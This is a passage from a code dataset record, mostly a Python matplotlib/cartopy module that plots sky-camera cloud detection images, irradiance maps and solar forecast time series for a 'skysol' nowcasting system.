"tkinter.END", "line_number": 805, "usage_type": "attribute"}, {"api_name": "pyxpdf.Document", "line_number": 816, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 933, "usage_type": "attribute"}, {"api_name": "tkinter.NORMAL", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 1008, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1008, "usage_type": "name"}, {"api_name": "tkinter.DISABLED", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "tkinter.TclError", "line_number": 1078, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1132, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1135, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1167, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1169, "usage_type": "attribute"}, {"api_name": "tkinter.NORMAL", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "tkinter.DISABLED", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "tkinter.NORMAL", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 1234, "usage_type": "attribute"}, {"api_name": "spacy.tokens.tokens", "line_number": 1249, "usage_type": "attribute"}, {"api_name": "spacy.tokens", "line_number": 1249, "usage_type": "name"}, {"api_name": "tkinter.filedialog.asksaveasfile", "line_number": 1263, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 1263, "usage_type": "name"}, {"api_name": "tkinter.END", "line_number": 1302, "usage_type": "attribute"}, {"api_name": "tkinter.Toplevel", "line_number": 1347, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 1348, "usage_type": "call"}, {"api_name": "tkinter.TOP", "line_number": 1349, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 1350, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 1351, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 1352, "usage_type": "call"}, {"api_name": "tkinter.BOTTOM", "line_number": 1353, "usage_type": "attribute"}]} +{"seq_id": "23621036636", "text": "# Import MatplotLib for visualization\nimport matplotlib.pyplot as plt\nimport time\nfrom datetime import datetime\nimport cv2\nimport os\nimport numpy as np\nfrom skysol.lib import optical_flow, misc, drawings\nfrom numpy import degrees, radians, arctan2, pi\nfrom matplotlib.dates import date2num, DateFormatter, DayLocator, HourLocator, MinuteLocator\nfrom matplotlib.ticker import MaxNLocator, LinearLocator\nfrom scipy.ndimage.interpolation import rotate\nfrom PIL import Image\nimport cmocean\n\n#===============================================================================\n#\n# Matplotlib settings\n#\n#===============================================================================\nplt.rcParams['ytick.labelsize'] = 11.\nplt.rcParams['xtick.labelsize'] = 11.\nplt.rcParams['axes.labelcolor'] = '000000'\nplt.rcParams['axes.linewidth'] = 2\nplt.rcParams['axes.labelsize'] = 12.\nplt.rcParams['axes.unicode_minus'] = False\nplt.rcParams['axes.facecolor'] = 'ffffff'\nplt.rcParams['xtick.major.size' ] = 5.5 # major tick size in points\nplt.rcParams['xtick.minor.size' ] = 3.5 # major tick size in points\nplt.rcParams['ytick.major.size' ] = 5.5 # major tick size in points\nplt.rcParams['ytick.minor.size' ] = 3.5 # major tick size in points\nplt.rcParams['ytick.major.width' ] = 2 # major tick size in points\nplt.rcParams['xtick.major.width' ] = 2 # major tick size in points\nplt.rcParams['ytick.color'] = '000000'\nplt.rcParams['xtick.color'] = '000000'\nplt.rcParams['grid.color'] = 'black' # grid color\nplt.rcParams['grid.linestyle'] = ':' # dotted\nplt.rcParams['grid.linewidth'] = 0.2 # in points\nplt.rcParams['font.size'] = 11.\nplt.rcParams['axes.titlesize'] = 'large'\nplt.rcParams['legend.fontsize'] = 'small'\nplt.rc('mathtext', fontset='cm', default='regular')\n\ndef patch_image_cache(style, cache_dir='tilecache'):\n \"\"\"\n Monkey patch the ``get_image()`` method of ``tiles`` to read and write image\n tiles from ``cache_dir`` before trying to download them.\n \"\"\"\n from cartopy.io.img_tiles import GoogleTiles\n\n tiles = GoogleTiles(style=style)\n # Ensure cache directory exists.\n os.makedirs(cache_dir, exist_ok=True)\n def get_image(tile):\n cache_img = os.path.join(cache_dir, style + '_%d_%d_%d.png' % tile )\n if os.path.exists(cache_img):\n img = Image.open(cache_img).convert(tiles.desired_tile_form)\n return img, tiles.tileextent(tile), 'lower'\n # Call get_image() method of tiles instance and store the downloaded image.\n img, extent, origin = type(tiles).get_image(tiles, tile)\n img.save(cache_img, 'PNG')\n return img, extent, origin\n tiles.get_image = get_image\n return tiles\n\ndef fill_between(x, y1, y2=0, ax=None, **kwargs):\n \"\"\"Plot filled region between `y1` and `y2`.\n\n This function works exactly the same as matplotlib's fill_between, except\n that it also plots a proxy artist (specifically, a rectangle of 0 size)\n so that it can be added it appears on a legend.\n \"\"\"\n ax = ax if ax is not None else plt.gca()\n ax.fill_between(x, y1, y2, **kwargs)\n p = plt.Rectangle((0, 0), 0, 0)#, **kwargs)\n ax.add_patch(p)\n return p\n\n\n\ndef scale_bar(ax, lat, lon, length, location=(0.5, 0.05), linewidth=5):\n \"\"\"\n ax is the axes to draw the scalebar on.\n location is center of the scalebar in axis coordinates ie. 0.5 is the middle of the plot\n length is the length of the scalebar in km.\n linewidth is the thickness of the scalebar.\n \"\"\"\n import utm\n import cartopy.crs as ccrs\n #Projection in metres, need to change this to suit your own figure\n zone = utm.latlon_to_zone_number(lat,lon)\n if lat < 0:\n sh = True\n else:\n sh = False\n utm_c = ccrs.UTM(zone, southern_hemisphere=sh)\n #Get the extent of the plotted area in coordinates in metres\n x0, x1, y0, y1 = ax.get_extent(utm_c)\n #Turn the specified scalebar location into coordinates in metres\n sbcx, sbcy = x0 + (x1 - x0) * location[0], y0 + (y1 - y0) * location[1]\n #Generate the x coordinate for the ends of the scalebar\n for i in range(0,length):\n if i % 2 == 0:\n c = 'k'\n else:\n c = 'w'\n bar_xs = [sbcx - length * 500 + i * 1000, sbcx - length * 500 + (i+1) * 1000]\n #Plot the scalebar\n ax.plot(bar_xs, [sbcy, sbcy], transform=utm_c, color=c, linewidth=linewidth)\n #Plot the scalebar label\n sbcy = sbcy + (y1 - y0) * 0.02\n ax.text(sbcx, sbcy, str(length) + ' km', color=\"black\", transform=utm_c, fontweight=\"bold\",\n horizontalalignment='center', verticalalignment='bottom', fontsize=15)\n\n\n\ndef plot(outfile, in_img, actdate, nstations, pyr, csk, ini,cmv, \\\n xsun, ysun, mask, csl, cmap, features, hist_flag=False, text_flag=False,\n params=None):\n\n fig = plt.figure(figsize=(16,9))\n\n ncols = 5; nrows = 3\n\n # get station index\n if ini.fcst_flag and nstations > 0:\n k = [j for j in range(0, nstations) if int(pyr[j].ind) == int(ini.statlist[0])][0]\n else:\n k = 0\n\n # Cloud classification\n if ini.cloud_class_apply:\n CC_long = ['Cumulus','Cirrus','Altocumulus','Clear Sky','Stratocumulus', 'Stratus', 'Nimbostratus']\n CC_short = ['Cu','Ci/Cs','Ac/Cc','Clear','Sc', 'St', 'Ns/Cb']\n ccstr_long = CC_long[params['imgclass']-1]\n ccstr_short = CC_short[params['imgclass']-1]\n if meta['imgclass'] > 0:\n cpstr = str(np.round(params['imgprob'][params['imgclass']-1],2))\n else:\n cpstr = \"-1\"\n else:\n ccstr_long = \"\"\n ccstr_short = \"\"\n cpstr = \"\"\n\n img = cmap.copy()\n\n if ini.cbh_flag:\n\n from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\n #-------------------------------------------------------------------\n # create map\n #-------------------------------------------------------------------\n\n style = \"satellite\"\n # load OSM background image\n background = patch_image_cache(style, \\\n ini.rootdir + '/tmp')\n\n ax = plt.subplot2grid((nrows,ncols), (0,2), \\\n colspan=2, rowspan=2, projection=background.crs)\n\n # set boundaries of map\n ax.set_extent((ini.lon_min, ini.lon_max, ini.lat_min, ini.lat_max ))\n bnd = ax.get_extent()\n\n # Add the background to the map\n res = ini.x_res * ini.grid_size\n if res > 10000:\n ax.add_image(background,12,alpha=0.9)\n elif res > 5000 and res <= 10000:\n ax.add_image(background,13,alpha=0.9)\n else:\n ax.add_image(background,14,alpha=0.9)\n\n #ax.imshow(background)\n gl = ax.gridlines(draw_labels=True,\n linewidth=1, color='white', alpha=0.6, linestyle='--')\n gl.xlabels_top = gl.ylabels_right = False\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlabel_style = {'size': 10, 'color': 'black'}\n gl.ylabel_style = {'size': 10, 'color': 'black'}\n\n # draw cloud/shadow map\n ax.imshow(img,cmap=plt.cm.gray,alpha=0.5, \\\n zorder=1, vmin=0, transform=background.crs, origin=\"upper\",\\\n extent=bnd)\n\n # Draw a scale bar\n scale_bar(ax, ini.lat0, ini.lon0, 5, linewidth=10)\n\n # Mark camera position\n sct = ax.scatter(ini.lon0, ini.lat0, \\\n s=25, marker='x',c=\"red\", transform=background.crs.as_geodetic())\n\n else:\n\n # draw cloud map\n ax = plt.subplot2grid((nrows,ncols), (0,2), colspan=2, rowspan=2)\n sct = ax.imshow(img, vmin=0, cmap=plt.cm.get_cmap('RdBu_r'))\n ax.grid('off')\n plt.title('Irradiance Map')\n plt.axis('off')\n\n\n # Forecast arrow\n if ini.flow_flag:\n\n # Point forecast\n xvals = []; yvals = []; vals = []\n cm = plt.cm.get_cmap('RdBu_r')\n cm = cmocean.cm.solar\n # Draw forecast arrow\n if ini.draw_forecast_path:\n for i in range(0, ini.fcst_horizon):\n inind = int(i / ini.fcst_res)\n x = int(pyr[k].fpos[i][1])\n y = int(pyr[k].fpos[i][0])\n if x > cmap.shape[0] - 2 or x <= 0 or y <= 0 or y > cmap.shape[1]-2: continue\n xvals.append(x); yvals.append(y)\n cskval = csk.ghi[csk.tind]\n vals.append(pyr[k].fghi[inind])\n\n if ini.cbh_flag:\n xvals = np.array(xvals)[np.isfinite(vals)]\n yvals = np.array(yvals)[np.isfinite(vals)]\n vals = np.array(vals)[np.isfinite(vals)]\n lats, lons = misc.grid2latlon(ini.lat0,ini.lon0,ini.x_res, ini.y_res, ini.grid_size, xvals, yvals)\n if len(xvals) > 0:\n sct = ax.scatter(lons, lats, s=30, vmin=0.15 * cskval,\n vmax=cskval + 0.15 * cskval, marker='o', c=vals, cmap=cm, \\\n edgecolor='none', transform=background.crs.as_geodetic(),zorder=10)\n # Draw station dots\n sct2 = plot_stat(ax, ini, nstations, pyr, csk.ghi[csk.tind], k,\n transform=background.crs.as_geodetic())\n else:\n\n sct = ax.scatter(xvals, yvals, s=30, vmin=0.15 * csk.ghi[csk.tind],\n vmax=csk.ghi[csk.tind] + 0.15 * csk.ghi[csk.tind], marker='o', c=vals, cmap=cm,\n edgecolor='none')\n\n # Colorbar\n try:\n cbar = plt.colorbar(mappable=sct, pad=.02, aspect=18, shrink=0.85)\n except ( AttributeError, TypeError, UnboundLocalError ):\n pass\n\n # Select area to cut from image\n imgsize = in_img.orig_color.shape\n x0 = int(ini.cy-ini.fx)\n if x0 < 0: x0 = 0\n x1 = int(ini.cy+ini.fx)\n if x1 > imgsize[0]: x1 = imgsize[0]\n y0 = int(ini.cx-ini.fy)\n if y0 < 0: y0 = 0\n y1 = int(ini.cx+ini.fy)\n if y1 > imgsize[1]: y1 = imgsize[1]\n\n\n # Origin Image\n plt.subplot2grid((nrows,ncols), (0,0), colspan=1, rowspan=1)\n img = in_img.orig_color_draw.copy()\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n #img = rotate(img[x0:x1,y0:y1],-np.degrees(ini.rot_angles[2]))\n cv2.circle(img,(ysun,xsun),15,0,-1)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n plt.imshow(img)\n plt.title('Original Image')\n del img\n\n # RBR\n ax = plt.subplot2grid((nrows,ncols), (1,1))\n img = in_img.rbr.copy() * 1.0\n img[mask] = np.nan\n img = img[x0:x1,y0:y1]\n a = ax.imshow(img,vmin=ini.rbr_thres-0.2, vmax=ini.rbr_thres+0.2,cmap=plt.cm.viridis)\n cbar = plt.colorbar(a,pad=.03,aspect=15,shrink=0.7, format=\"%.2f\" )\n plt.axis('off')\n if csl == 0: plt.title('RBR')\n if csl == 1: plt.title('RBR - CSL')\n if csl == 2: plt.title('RBR corrected')\n\n\n\n if hist_flag:\n\n in_img.rbr[mask]=np.nan\n plt.subplot2grid((nrows,ncols), (2,0),colspan=1)\n plt.hist((in_img.rbr.flatten()), \\\n range=(0.3,1.3), bins=125, color=\"red\",alpha=0.5,normed=True)\n plt.ylim(0,15)\n plt.axvline(ini.rbr_thres, color='b', linestyle='dashed', linewidth=2)\n plt.legend(['RBR threshold','RBR'],loc=2)\n\n if ini.csi_mode == \"hist\" and ini.radiation:\n ind = pyr[k].tind\n y = np.divide( pyr[k].ghi[ind-ini.avg_csiminmax:ind], csk.ghi[csk.tind-ini.avg_csiminmax:csk.tind] )\n y = y[np.isfinite(y)]\n if len(y) > (0.6*ini.avg_csiminmax):\n ax = plt.subplot2grid((nrows,ncols), (2,1),colspan=1)\n plt.hist((y),bins=ini.hist_bins, color=\"red\",range=(0.0,1.5))\n plt.axvline(pyr[k].csi_min, color='b', linestyle='dashed', linewidth=2)\n plt.axvline(pyr[k].csi_max, color='b', linestyle='dashed', linewidth=2)\n plt.xlim(0.2,1.5)\n ax.text(0.2,1.05,'k* histogram',fontsize=9,transform=ax.transAxes)\n\n # Clear Sky Reference\n if csl == 1:\n plt.subplot2grid((nrows,ncols), (1,0))\n img = in_img.cslimage\n img[mask] = np.nan\n img = img[x0:x1,y0:y1]\n a = plt.imshow(img,vmin=0.5, vmax=1.2,cmap=plt.cm.viridis)\n plt.title('CSL')\n plt.axis('off')\n plt.colorbar(a,pad=.03, aspect=15,shrink=0.7)\n\n if ini.plot_features:\n\n for f in range(0,len(features.vec)):\n if f > len(features.vec)/2:\n xo = 0.7; yo = 0.3-(f-len(features.vec)/2)/50.\n else:\n xo = 0.43; yo = 0.3-f/50.\n txt = '%g' % (features.vec[f])\n fig.text(xo,yo,features.names[f][0:26])\n fig.text(xo+0.17,yo,txt)\n\n # RBR differences\n# img = in_img.rbr_orig - in_img.rbr\n# plt.subplot2grid((nrows,ncols), (1,0))\n# img[mask] = np.nan\n# a = plt.imshow(img[x0:x1,y0:y1],cmap=plt.cm.get_cmap('bwr'),vmin=-0.2,vmax=0.2)\n# plt.axis('off')\n# plt.colorbar(a,pad=.03, aspect=15,shrink=0.7)\n# plt.title('RBR diff')\n\n # Binary cloud mask\n plt.subplot2grid((nrows,ncols), (0,1))\n img = in_img.binary_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img[in_img.mask_horizon] = 0\n img = img[x0:x1,y0:y1]\n #img = rotate(img,np.degrees(ini.rot_angles[2]))\n plt.title('Cloud decision')\n plt.axis('off')\n plt.imshow(img)\n\n\n\n # Draw timeseries\n past = ini.plot_last_vals\n horizon = int(ini.fcst_horizon/ini.fcst_res) + 1\n horizon = int(ini.fcst_horizon)\n if hist_flag:\n ax = plt.subplot2grid((nrows,ncols), (2,2),colspan=3)\n elif ini.plot_features:\n ax = plt.subplot2grid((nrows,ncols), (2,0),colspan=2)\n else:\n ax = plt.subplot2grid((nrows,ncols), (2,0),colspan=5)\n\n maxval = 0\n\n i = 0\n\n if ini.radiation:\n\n # Plot measurements\n if ini.live:\n slc = slice(pyr[k].tind-past,pyr[k].tind,ini.fcst_res)\n x = pyr[k].time[slc]\n y = pyr[k].ghi[slc]\n y2 = pyr[k].dhi[slc]\n else:\n slc = slice(pyr[k].tind-past,pyr[k].tind+horizon,ini.fcst_res)\n x = pyr[k].time[slc]\n y = pyr[k].ghi[slc]\n y2 = pyr[k].dhi[slc]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n if len(dates) > 0: plt.plot(dates, y, 'b-',lw=2.0, label=\"Measurement\")\n if len(y2) > 0:\n fill_between(dates,0,y2,alpha=0.5,linewidth=0,facecolor=\"yellow\", label=\"DHI\")\n fill_between(dates,y2,y,alpha=0.5,linewidth=0,facecolor=\"orange\", label=\"DNI\")\n\n # Analysis Values\n nvals = ini.plot_last_vals / ini.camera_res / ini.rate\n x = pyr[k].aghi_time[-int(nvals):]\n dates=[datetime.utcfromtimestamp(ts) for ts in x if ~np.isnan(ts) ]\n if len(dates) > 0:\n y = pyr[k].aghi[-len(dates):]\n plt.plot(dates, y, 'gv', label=\"Analysis\")\n\n # Clear sky irradiance\n slc = slice(csk.tind-ini.plot_last_vals, csk.tind+ini.fcst_horizon, ini.fcst_res)\n x = csk.time[slc]\n dates=[datetime.utcfromtimestamp(ts) for ts in x ]\n y = csk.ghi[slc]\n plt.plot(dates, y, '--', color='black', label=\"Clear Sky\")\n maxval = 1.7 * csk.actval\n plt.ylabel('Irradiance in $Wm^{-2}$')\n\n # Forecast Values\n x = pyr[k].ftime\n dates=[ datetime.utcfromtimestamp(ts) for ts in x if ~np.isnan(ts) ]\n y = pyr[k].fghi[:len(dates)]\n\n plt.plot(dates,y,'r-',lw=2.0, label=\"Forecast\")\n\n # Vertical line to plot current time instance\n plt.axvline(actdate, color='b', linestyle='--', lw=2.0)\n plt.xlabel('Time [UTC]')\n plt.legend(loc=\"upper left\", ncol=3, fontsize=8)\n plt.ylim([0,maxval])\n\n ax.xaxis.set_major_formatter(DateFormatter('%H:%M:%S'))\n ax.xaxis.set_major_locator(LinearLocator(numticks=6))\n ax.xaxis_date()\n\n # Draw Text\n ax = plt.subplot2grid((nrows,ncols), (0,4),rowspan=2)\n ax.axis('off')\n nowtime = datetime.strftime(datetime.utcnow(),\"%Y-%m-%d %H:%M:%S\")\n acttime = datetime.strftime(actdate,\"%Y-%m-%d %H:%M:%S\")\n loctime = str(in_img.locdate.isoformat(' '))\n ax.text(-0.3,0.95,acttime + str(' UTC'), weight=\"bold\")\n ax.text(0.2,0.02,'Created:\\n' + nowtime + str(' UTC'),fontsize=9)\n ax.text(-0.3,0.9,\"Sun Zenith = \" + str(round(params['sza'],1)) + '$^\\circ$' )\n ax.text(-0.3,0.86,\"Sun Azimuth = \" + str(round(params['saz'],1)) + '$^\\circ$' )\n if ini.cbh_flag: ax.text(-0.3,0.82,'Cloud Base Height: ' + \\\n str(int(params['cbh'])) + ' m ')\n ax.text(-0.3,0.79,'Cloud Type: ' + ccstr_long + ' ' + ccstr_short + ' ' + cpstr)\n ax.text(-0.3,0.72,'Radiation measurements \\n' + params['txt'] + ':' )\n ax.text(-0.3,0.65,\"GHI = \" + str(round(params['ghi'],1)) + ' $W/m^2$ (' + str(round(params['csi_ghi'],2))+')' )\n ax.text(-0.3,0.61,\"DHI = \" + str(round(params['dhi'],1)) + ' $W/m^2$ (' + str(round(params['csi_dhi'],2))+')' )\n ax.text(-0.3,0.57,\"DNI = \" + str(round(params['dni'],1)) + ' $W/m^2$ (' + str(round(params['csi_dni'],2))+')' )\n\n if ini.mode <= 1:\n ax.text(-0.3,0.40,'Cloud Cover = ' + str(round(params['cc'],1)) + ' %' )\n\n\n if ini.flow_flag:\n if ini.cbh_flag:\n unit = \"m/s\"\n else:\n unit = \"pix/s\"\n ax.text(-0.3, 0.34, '#CMV = ' + str(np.sum(cmv.flag)))\n um = cmv.speed[-1]; vm = cmv.direction[-1]\n ume = cmv.sspeed[-1]; vme = cmv.sdirection[-1]\n ax.text(-0.3,0.30,'All speed = ' + str(round(um,2)) + '$\\pm$' + str(round(ume,2)) + unit)\n ax.text(-0.3,0.26,'All direction = ' + str(round(np.degrees(vm),2)) + '$\\pm$' + str(round(np.degrees(vme),2)) +'$^\\circ$')\n um = cmv.mean_speed; vm = cmv.mean_direction\n ume = cmv.std_speed; vme = cmv.std_direction\n ax.text(-0.3,0.22,'Global speed = ' + str(round(um,2)) + '$\\pm$' + str(round(ume,2)) + unit)\n ax.text(-0.3,0.18,'Global direction = ' + str(round(np.degrees(vm),2)) + '$\\pm$' + str(round(np.degrees(vme),2)) +'$^\\circ$')\n\n ax.text(-0.3,0.14,'Lens Clear = ' + str(params['img_qc']))\n if in_img.useful_image:\n qc = \"OK\"\n else:\n qc = \"BAD\"\n ax.text(-0.3,0.10,'Quality Flag = ' + qc)\n\n\n # Final settings\n fig.set_figwidth = 16.\n fig.set_figheight = 9.\n fig.set_dpi = 50.\n fig.subplots_adjust(hspace=0.15,wspace=0.4,left=0.05, right=0.97, top=0.95, bottom=0.08)\n plt.savefig(outfile,format=ini.outformat)\n plt.clf()\n plt.close('all')\n\n\n\n\n\ndef plot_stat(ax, ini, nstations, pyr, cskval, k, transform=None):\n cm = plt.cm.get_cmap('RdBu_r')\n cm = cmocean.cm.solar\n xsct = []; ysct = []; val = []; flag = []; isdata = []\n # collect data from single stations\n for i in range(0, nstations):\n x = float(pyr[i].map_y)\n y = float(pyr[i].map_x)\n z = np.nanmean(pyr[i].ghi[pyr[i].tind-ini.rate:pyr[i].tind])\n xsct.append(x)\n ysct.append(y)\n val.append(z)\n if np.isfinite(z):\n isdata.append(True)\n flag.append(pyr[i].qflag[pyr[i].tind])\n else:\n isdata.append(False)\n flag.append(-1)\n isdata = np.array(isdata)\n xsct = np.array(xsct)\n ysct = np.array(ysct)\n val = np.array(val)\n # geographical coordinates\n if transform is not None:\n if np.sum(isdata) == 0:\n lats, lons = misc.grid2latlon(ini.lat0,ini.lon0,ini.x_res, ini.y_res, \\\n ini.grid_size, xsct, ysct)\n sct = ax.scatter(lons, lats, \\\n s=25, marker='x',c=\"red\", transform=transform)\n else:\n lats, lons = misc.grid2latlon(ini.lat0,ini.lon0,ini.x_res, ini.y_res, \\\n ini.grid_size, np.array(xsct), np.array(ysct))\n sct = ax.scatter(lons[isdata], lats[isdata], s=25, marker='x', vmin=0.15 * cskval, \\\n vmax=cskval + 0.15 * cskval, c=val[isdata], cmap=cm, edgecolor='none', \\\n transform=transform, zorder=30)\n else:\n # Use grid coordinates\n sct = ax.scatter(xsct[k], ysct[k], s=25, marker='o', vmin=0.15 * cskval, \\\n vmax=cskval + 0.15 * cskval, c=val[k], cmap=cm, edgecolor='none')\n\n return sct\n\n\ndef plot_detection_full(outfile, ini, in_img, mask, **params):\n\n ncols = 5; nrows = 2\n textsize=19\n\n # Select area to cut from image\n imgsize = in_img.orig_color.shape\n x0 = int(ini.cy-ini.fx)\n if x0 < 0: x0 = 0\n x1 = int(ini.cy+ini.fx)\n if x1 > imgsize[0]: x1 = imgsize[0]\n y0 = int(ini.cx-ini.fy)\n if y0 < 0: y0 = 0\n y1 = int(ini.cx+ini.fy)\n if y1 > imgsize[1]: y1 = imgsize[1]\n\n\n fig = plt.figure(figsize=(15,6))\n\n\n # Original Image\n ax = plt.subplot2grid((nrows,ncols), (0,0))\n img = in_img.orig_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.text(0.03,0.85,'a)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.imshow(img)\n\n\n # Pixel Intensity\n ax = plt.subplot2grid((nrows,ncols), (1,0))\n img = 1.0 * in_img.orig_gray.copy()\n img[mask] = np.nan\n img = img[x0:x1,y0:y1]\n a = plt.imshow(img, vmin=0, vmax=255, cmap=plt.cm.viridis)\n cb = plt.colorbar(a,shrink=0.7,aspect=15)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n ax.text(0.03,0.9,'b)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.axis('off')\n\n\n # CSL Image\n ax = plt.subplot2grid((nrows,ncols), (0,1))\n try:\n img = in_img.cslimage\n img[mask] = np.nan\n a = plt.imshow(img[x0:x1,y0:y1],vmin=0.5, vmax=1.2, cmap=plt.cm.viridis)\n ax.text(0.03,0.9,'c)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.axis('off')\n cb = plt.colorbar(a,shrink=0.7,aspect=15)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n except AttributeError:\n pass\n\n # RBR Original\n ax = plt.subplot2grid((nrows,ncols), (0,2))\n img = in_img.rbr_orig\n img[mask] = np.nan\n a = plt.imshow(img[x0:x1,y0:y1],vmin=0.5, vmax=1.2, cmap=plt.cm.viridis)\n ax.text(0.03,0.9,'e)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.axis('off')\n cb = plt.colorbar(a,pad=.03, aspect=15,shrink=0.7)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n\n # RBR diff\n img = in_img.rbr_orig - in_img.rbr\n ax = plt.subplot2grid((nrows,ncols), (1,1))\n img[mask] = np.nan\n a = plt.imshow(img[x0:x1,y0:y1],cmap=plt.cm.get_cmap('bwr'),vmin=-0.5,vmax=0.5)\n plt.axis('off')\n ax.text(0.03,0.9,'d)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n cb = plt.colorbar(a,pad=.03, aspect=15,shrink=0.7)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n\n\n\n # RBR modified\n ax = plt.subplot2grid((nrows,ncols), (1,2))\n img = in_img.rbr.copy() * 1.0\n img[mask] = np.nan\n img = img[x0:x1,y0:y1]\n a = ax.imshow(img,vmin=ini.rbr_thres-0.2, vmax=ini.rbr_thres+0.2, cmap=plt.cm.viridis)\n cb = plt.colorbar(a,pad=.03,aspect=15,shrink=0.7)\n for t in cb.ax.get_yticklabels():\n t.set_fontsize(12)\n ax.text(0.03,0.9,'f)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n plt.axis('off')\n\n # Cloud map original\n sky_bool = in_img.rbr_orig <= ini.rbr_thres\n cloud_bool = in_img.rbr_orig > ini.rbr_thres\n binary_color = in_img.orig_color.copy()\n binary_color[sky_bool, :] = [ 255, 0 , 0 ]\n binary_color[cloud_bool, :] = [ 255, 255 , 255 ]\n binary_color[mask, :] = 0 # mask\n\n ax = plt.subplot2grid((nrows,ncols), (0,3))\n img = binary_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.imshow(img)\n ax.text(0.03,0.85,'g)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n\n # Cloud map corrected\n ax = plt.subplot2grid((nrows,ncols), (1,3))\n img = in_img.binary_color.copy()\n #cloud_bool = (img != [0,0,0]) & (img != [255,0,0])\n #img[cloud_bool] = 255\n #if ini.mask_sun: img[in_img.sun_mask] = 0\n #if ini.dyn_horizon: img[in_img.sun_mask] = 0\n img[mask] = 0\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.imshow(img)\n ax.text(0.03,0.85,'h)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n # Histogram\n ax = plt.subplot2grid((nrows,ncols), (0,4))\n in_img.rbr_orig[mask] = np.nan\n ax.hist(( in_img.rbr_orig.flatten()) , range=(0.0,1.1), bins=256, normed=True, color=\"blue\")\n ax.set_ylim(0,15)\n plt.axvline(ini.rbr_thres, color='b', linestyle='dashed', linewidth=2)\n ax.text(0.03,0.85,'i)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n\n ax = plt.subplot2grid((nrows,ncols), (1,4))\n in_img.rbr[mask] = np.nan\n plt.hist((in_img.rbr.flatten()), range=(0.0,1.1), bins=256, color=\"blue\",normed=True)\n plt.ylim(0,15)\n plt.axvline(ini.rbr_thres, color='b', linestyle='dashed', linewidth=2)\n ax.text(0.03,0.85,'j)',color=\"black\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n\n # Final settings\n fig.subplots_adjust(hspace=0.1,wspace=0.2,left=0.01, right=0.99, top=0.99, bottom=0.05)\n plt.savefig(outfile,format=ini.outformat)\n plt.clf()\n\n\n\ndef plot_detection(outfile, ini, in_img):\n \"\"\" Plot only raw image and binary decision \"\"\"\n ncols = 2; nrows = 1\n textsize=19\n\n # Select area to cut from image\n imgsize = in_img.orig_color.shape\n x0 = int(ini.cy-ini.fx)\n if x0 < 0: x0 = 0\n x1 = int(ini.cy+ini.fx)\n if x1 > imgsize[0]: x1 = imgsize[0]\n y0 = int(ini.cx-ini.fy)\n if y0 < 0: x0 = 0\n y1 = int(ini.cx+ini.fy)\n if y1 > imgsize[1]: y1 = imgsize[1]\n\n fig = plt.figure(figsize=(6,3))\n\n # Original Image\n ax = plt.subplot2grid((nrows,ncols), (0,0))\n img = in_img.orig_color.copy()\n img = cv2.cvtColor(img,cv2.COLOR_RGB2BGR)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.text(0.03,0.85,'a)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n ax.imshow(img)\n\n\n # Cloud map\n ax = plt.subplot2grid((nrows,ncols), (0,1))\n img = in_img.binary_color.copy()\n cloud_bool = (img != [0,0,0]) & (img != [255,0,0])\n img[cloud_bool] = 255\n #if ini.mask_sun: img[in_img.sun_mask] = 0\n #if ini.dyn_horizon: img[in_img.sun_mask] = 0\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n img = img[x0:x1,y0:y1]\n plt.axis('off')\n ax.imshow(img)\n ax.text(0.03,0.85,'b)',color=\"white\",fontweight=\"bold\",fontsize=textsize,transform=ax.transAxes)\n\n # Final settings\n 